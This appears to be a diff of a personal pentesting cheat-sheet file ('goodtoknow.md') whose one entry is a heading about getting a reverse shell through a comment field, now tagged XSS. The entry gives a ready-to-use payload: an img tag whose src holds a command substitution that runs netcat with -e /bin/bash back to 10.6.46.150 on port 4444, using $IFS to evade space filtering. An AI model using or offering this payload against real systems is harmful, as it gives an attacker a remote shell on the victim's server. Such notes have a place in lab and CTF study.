sunst0rm/Good_to_know/goodtoknow.md

 <br />
 <br />

-Getting rev shell when there is a chance to write a comment
+Getting rev shell when there is a chance to write a comment XSS

 `<img src=http://10.6.46.150/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.6.46.150 '$IFS'4444')>`